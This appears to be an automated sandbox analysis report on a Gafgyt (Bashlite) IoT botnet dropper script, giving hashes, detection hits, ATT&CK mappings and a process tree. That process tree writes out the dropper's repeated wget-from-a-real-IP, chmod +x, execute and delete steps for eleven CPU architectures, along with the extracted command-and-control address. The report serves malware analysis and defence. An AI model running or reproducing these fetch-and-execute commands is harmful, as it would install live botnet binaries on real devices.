gafgyt | 297d3e7c3baa68bca45a6802e9d1b7ff08a7125a60f409b4980403d2e64de79d

Analysis

max time kernel
12s
max time network
14s
platform
debian-9_mips
resource
debian9-mipsbe-20240729-en
resource tags

arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
29-12-2024 12:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

1KB
MD5

9d68e98f65d13deb163ddff8775e6790
SHA1

f7d6f96e95f276c566c78d7d43231946f377e8fd
SHA256

297d3e7c3baa68bca45a6802e9d1b7ff08a7125a60f409b4980403d2e64de79d
SHA512

241b96ef4a8f162432f02791b13003aa31b9deb7d1c52976c7c4a4967c7611cf79976f9ecffb196b56fcf519e64b6b8dcc63819362a65d6a52ae17ee733117d5

Score

10^/10

gafgyt botnet defense_evasion discovery

Malware Config

Extracted

Family

gafgyt

98.159.236.221:23

Signatures

Detected Gafgyt variant 11 IoCs

resource	yara_rule
behavioral3/files/fstream-1.dat	family_gafgyt
behavioral3/files/fstream-2.dat	family_gafgyt
behavioral3/files/fstream-3.dat	family_gafgyt
behavioral3/files/fstream-4.dat	family_gafgyt
behavioral3/files/fstream-5.dat	family_gafgyt
behavioral3/files/fstream-6.dat	family_gafgyt
behavioral3/files/fstream-7.dat	family_gafgyt
behavioral3/files/fstream-8.dat	family_gafgyt
behavioral3/files/fstream-9.dat	family_gafgyt
behavioral3/files/fstream-10.dat	family_gafgyt
behavioral3/files/fstream-11.dat	family_gafgyt

Gafgyt family
gafgyt
Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
botnet gafgyt

File and Directory Permissions Modification 1 TTPs 11 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
771	chmod
782	chmod
796	chmod
743	chmod
754	chmod
759	chmod
764	chmod
811	chmod
827	chmod
731	chmod
749	chmod

Executes dropped EXE 11 IoCs

ioc	pid	Process
/tmp/mips	733	mips
/tmp/mpsel	745	mpsel
/tmp/sh4	750	sh4
/tmp/x86_64	755	x86_64
/tmp/arm6l	760	arm6l
/tmp/i686	765	i686
/tmp/powerpc	772	powerpc
/tmp/i586	783	i586
/tmp/m68k	798	m68k
/tmp/armv4l	812	armv4l
/tmp/armv5l	828	armv5l

Writes DNS configuration 1 TTPs 1 IoCs

Writes data to DNS resolver config file.

Adversary-in-the-Middle

T1557

description	ioc	Process
File opened for modification	/etc/resolv.conf	mips

Changes its process name 1 IoCs

description	pid	Process
Changes the process name, possibly in an attempt to hide itself	733	mips

System Network Configuration Discovery 1 TTPs 3 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
711	wget
733	mips
736	rm

Writes file to tmp directory 11 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/x86_64	wget
File opened for modification	/tmp/arm6l	wget
File opened for modification	/tmp/i686	wget
File opened for modification	/tmp/m68k	wget
File opened for modification	/tmp/armv4l	wget
File opened for modification	/tmp/mips	wget
File opened for modification	/tmp/mpsel	wget
File opened for modification	/tmp/sh4	wget
File opened for modification	/tmp/powerpc	wget
File opened for modification	/tmp/i586	wget
File opened for modification	/tmp/armv5l	wget

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:708
- /usr/bin/wget
  wget http://98.159.236.221/mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:711
- /bin/chmod
  chmod +x mips
  2⤵
  - File and Directory Permissions Modification
  PID:731
- /tmp/mips
  ./mips
  2⤵
  - Executes dropped EXE
  - Writes DNS configuration
  - Changes its process name
  - System Network Configuration Discovery
  PID:733
- /bin/rm
  rm -rf mips
  2⤵
  - System Network Configuration Discovery
  PID:736
- /usr/bin/wget
  wget http://98.159.236.221/mpsel
  2⤵
  - Writes file to tmp directory
  PID:738
- /bin/chmod
  chmod +x mpsel
  2⤵
  - File and Directory Permissions Modification
  PID:743
- /tmp/mpsel
  ./mpsel
  2⤵
  - Executes dropped EXE
  PID:745
- /bin/rm
  rm -rf mpsel
  2⤵
  PID:747
- /usr/bin/wget
  wget http://98.159.236.221/sh4
  2⤵
  - Writes file to tmp directory
  PID:748
- /bin/chmod
  chmod +x sh4
  2⤵
  - File and Directory Permissions Modification
  PID:749
- /tmp/sh4
  ./sh4
  2⤵
  - Executes dropped EXE
  PID:750
- /bin/rm
  rm -rf sh4
  2⤵
  PID:752
- /usr/bin/wget
  wget http://98.159.236.221/x86_64
  2⤵
  - Writes file to tmp directory
  PID:753
- /bin/chmod
  chmod +x x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:754
- /tmp/x86_64
  ./x86_64
  2⤵
  - Executes dropped EXE
  PID:755
- /bin/rm
  rm -rf x86_64
  2⤵
  PID:757
- /usr/bin/wget
  wget http://98.159.236.221/arm6l
  2⤵
  - Writes file to tmp directory
  PID:758
- /bin/chmod
  chmod +x arm6l
  2⤵
  - File and Directory Permissions Modification
  PID:759
- /tmp/arm6l
  ./arm6l
  2⤵
  - Executes dropped EXE
  PID:760
- /bin/rm
  rm -rf arm6l
  2⤵
  PID:762
- /usr/bin/wget
  wget http://98.159.236.221/i686
  2⤵
  - Writes file to tmp directory
  PID:763
- /bin/chmod
  chmod +x i686
  2⤵
  - File and Directory Permissions Modification
  PID:764
- /tmp/i686
  ./i686
  2⤵
  - Executes dropped EXE
  PID:765
- /bin/rm
  rm -rf i686
  2⤵
  PID:767
- /usr/bin/wget
  wget http://98.159.236.221/powerpc
  2⤵
  - Writes file to tmp directory
  PID:768
- /bin/chmod
  chmod +x powerpc
  2⤵
  - File and Directory Permissions Modification
  PID:771
- /tmp/powerpc
  ./powerpc
  2⤵
  - Executes dropped EXE
  PID:772
- /bin/rm
  rm -rf powerpc
  2⤵
  PID:774
- /usr/bin/wget
  wget http://98.159.236.221/i586
  2⤵
  - Writes file to tmp directory
  PID:775
- /bin/chmod
  chmod +x i586
  2⤵
  - File and Directory Permissions Modification
  PID:782
- /tmp/i586
  ./i586
  2⤵
  - Executes dropped EXE
  PID:783
- /bin/rm
  rm -rf i586
  2⤵
  PID:787
- /usr/bin/wget
  wget http://98.159.236.221/m68k
  2⤵
  - Writes file to tmp directory
  PID:788
- /bin/chmod
  chmod +x m68k
  2⤵
  - File and Directory Permissions Modification
  PID:796
- /tmp/m68k
  ./m68k
  2⤵
  - Executes dropped EXE
  PID:798
- /bin/rm
  rm -rf m68k
  2⤵
  PID:800
- /usr/bin/wget
  wget http://98.159.236.221/armv4l
  2⤵
  - Writes file to tmp directory
  PID:802
- /bin/chmod
  chmod +x armv4l
  2⤵
  - File and Directory Permissions Modification
  PID:811
- /tmp/armv4l
  ./armv4l
  2⤵
  - Executes dropped EXE
  PID:812
- /bin/rm
  rm -rf armv4l
  2⤵
  PID:815
- /usr/bin/wget
  wget http://98.159.236.221/armv5l
  2⤵
  - Writes file to tmp directory
  PID:816
- /bin/chmod
  chmod +x armv5l
  2⤵
  - File and Directory Permissions Modification
  PID:827
- /tmp/armv5l
  ./armv5l
  2⤵
  - Executes dropped EXE
  PID:828
- /bin/rm
  rm -rf armv5l
  2⤵
  PID:832

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Adversary-in-the-Middle

T1557

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Adversary-in-the-Middle

T1557

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/arm6l

Filesize
127KB

MD5
d1c4c00fba7ba4e0606b10fea3c4132d

SHA1
f83bedecd5953577853d73059036eee16c03f4e7

SHA256
95de15b8fc652d35e7be3169c2bae76bb347d4f35fd547b31e5f3e4697a65a90

SHA512
b07382d2352df0e48b628ae88381c9e6b794462e8dbbaf2ddcda3a03a4af89184da155c05c2cbbf7c9c4d778a357618950b88f7c709ae8bc703ce46a342304c4

Download Submit
/tmp/armv4l

Filesize
113KB

MD5
e16ee7aa765eda6e562ca86e08c9945b

SHA1
052f6f651d95608d861a163da08f9de329947374

SHA256
d61e85f0ebb52fd7c8ccffcffdc9b9d437ad5e64c06d23d69c95c835286387fd

SHA512
028504d6c85657710235d12e8da7cfe5e0e0e1cfa13557a31125853f3a1275d8cf60a8041c8e74e54c5fc9cacb558d5f1fc53fb5a56e475e75b4916cb9cdd9f9

Download Submit
/tmp/armv5l

Filesize
106KB

MD5
420cfb8958ec3bb756882e6c75cef650

SHA1
9440d547136a91310a8b34cffb54ff9d802ed734

SHA256
1b6436787e2d470eb8bd5af8f2ffd1e555d6cfbb05daf46acbd0b1dde91d2e8e

SHA512
08b75964959e06ab366b3d68dca91ed3d6c8f93bcffad1b9212d96e6ccc96fcb45e875180d58738e71ab23d148ce94aca598920564bd11cb2bebf3e3e0585baa

Download Submit
/tmp/i586

Filesize
85KB

MD5
90df5aecf2e241b657515234c918814a

SHA1
2a7688a14981c891baafe8446d6f2be50243f72f

SHA256
195e559405a35b0509843beebcd67cb95bc3189ec0abfd823b15108a36d00a02

SHA512
486bc1a462a193682aa475da98b66c8d2c580dd0b20913908e5d80c0e493ee5cd3e0401e3755ff72451920f827cd55797f48c7c107150bded80307abd1280d0d

Download Submit
/tmp/i686

Filesize
89KB

MD5
766a3f2bc9c93e264a77b1431224d4df

SHA1
d782c81890f6843bf6080607dba7c564938c9b59

SHA256
abb74b82d4f661b0c8021e31a05ed9ad827d714b1eca2a786e8d25cd5f06821a

SHA512
beae8c3a22ac6ad041f69a8cc7d9c0dae80eb6a52fd3e943e8add5df2c0b5a349981a684ad4b22e9524af3cf299508781c181479828919eeda513b7c3a1ccd71

Download Submit
/tmp/m68k

Filesize
106KB

MD5
438e516c1ab96040ec6cf0b5cf028d06

SHA1
651e5cdfd43ade63e70a7aa899dcebe6c9a350be

SHA256
eb2e54bc87007ea3e589cd5415207acbcd6b2c0e2667f023094df8a1bf113e56

SHA512
25c1a2995ec48554924b7ddc341cf57e0cf007d16e461d9d5ca4101fbd3a63480c76898c3bd9a1c8823568a159f595fac7f26b33416469ff6ec04a4dc2c8c198

Download Submit
/tmp/mips

Filesize
134KB

MD5
90ffcf1f61e4b9e6dc1d46d972777254

SHA1
432915c960bef43326998781aafe211c0388eeb4

SHA256
67369b7f1b201dded6f52a42d5ace1cdc6a160bed1ce4bc624eac01b1058c1b9

SHA512
2853bb4ab614cae6f089572276a99ea5932138f3ee1ce3fada72ec495780aadd7e7c40921ccd1d946c8bb90110adf5fd4d9eb23b8c5c147afd99636baea640ad

Download Submit
/tmp/mpsel

Filesize
134KB

MD5
b78275200139325f74582e5b1484be49

SHA1
3c44fb4173161e7c465cee960a6b3dac483b88b8

SHA256
11065f7356e62038d28f238f2901a3524a923fc7f5c76657fdcfeb03e14b287e

SHA512
74a6b8c073dd11fb8a7d0392711ca055fc1cc8309c4b37ae37618b34bf21db01225b4f6503a44735520da331e71bfa8f748b661abb54efc96029732f8b7048db

Download Submit
/tmp/powerpc

Filesize
101KB

MD5
7c59ffa8175cb9bc8aa802571fa3bb9a

SHA1
b58b98266a89833d95c91a0d23e82c8978601e6b

SHA256
c1a10d9d73e614554cd04613787504c568bfe5b421a2956d96eb1f1df5164c79

SHA512
c7c70f42598f12a83df30a78c5de95c7de072c068ec1e654f03bffa108d10a6e892f26b1e3f66f8b070a562ff66e859bf69aa902411ee71cdd448462ad8b42fb

Download Submit
/tmp/sh4

Filesize
93KB

MD5
ca8e537079361639effaf61f35cdd40f

SHA1
c3cdfd1ec399b05e6e11a8b7979c3e328d69ef81

SHA256
12d7748f0e4085f08e8531d782c80bb480b7ba5b9fc770fbd884b141f5f4050e

SHA512
e17358e30cc2568abb119cd80fc7bfdaab0fb25345f7cfa5122567f760bff65579480ab32cc24fd3eb625168f7acd2293c12b9d310650d192429b865d6c41ae9

Download Submit
/tmp/x86_64

Filesize
100KB

MD5
43d9d036cb3a5aab6154e8740f9d6ece

SHA1
3735d09ba41944ba8d873c2f704d22297b0222fc

SHA256
42887360eadb0f439745caaf2eb0a1767405c7b2541c9e45cef532580b8e46ee

SHA512
bbcad62c040b6af840f4b20a555a0418d2f37b68521475fbd0af940a7415034f4778aa3deb96e52b4cec9db95435a887e89059eaed5c7b1e24d246409e1a9289

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads